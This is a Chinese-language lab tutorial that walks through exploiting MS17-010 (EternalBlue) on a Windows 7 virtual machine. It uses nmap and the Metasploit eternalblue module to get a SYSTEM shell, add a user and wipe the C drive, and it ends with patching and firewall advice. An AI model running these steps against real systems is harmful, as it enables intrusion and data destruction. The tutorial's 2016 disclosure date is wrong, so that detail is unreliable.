永恒之藍MS17-010是2016年8月公開的漏洞,基于445埠迅速傳播擴散,危害超出想象的嚴重,
實驗準備:
虛擬機下kali攻擊機:192.168.111.128
w7靶機:192.168.111.129
在同一網段并且能ping通
首先利用nmap對靶機進行掃描
Nmap -sV 192.168.111.129
發現存在開放445埠 那我們可以利用永恒之藍進行入侵
打開msfconsole 搜索ms17-010
這邊我們可以進行選擇可以利用的模塊
use exploit/windows/smb/ms17_010_eternalblue
看一下我們需要設定的引數
Show options
這邊的本機地址和監聽埠都設定好了 我們只需要把RHOSTS(靶機ip)設定好就可以利用了
Set RHOST 192.168.111.129
然后我們進行攻擊run/exploit
可以 看到反彈成功 這里我們可以為所欲為了
可以看到這里我們是system權限 如果不是可以再進行提權操作
可以創建一個用戶 test
可以在w7靶機上查看我們創建的用戶已經成功了
如果我們想把靶機格式化或者搞破壞可以直接洗掉C盤(不建議這樣做)
強制洗掉C盤
這里可以清晰看到很多洗掉的程序
洗掉完成之后 會話自動掉了 回到靶機看一下 所有的軟體都不能運行了 相當于系統作廢了
整個實驗我們可以清楚的看到永恒之藍的危害之大和利用的方便
防止被永恒之藍攻擊的方法:
1.安裝最新的安全補丁
2.開啟防火墻
3.無特殊需要下關閉445埠
本次實驗基于虛擬機僅用于學習測驗,惡意破壞或者攻擊是違法行為!
轉載請註明出處,本文鏈接:https://www.uj5u.com/qita/200657.html
標籤:其他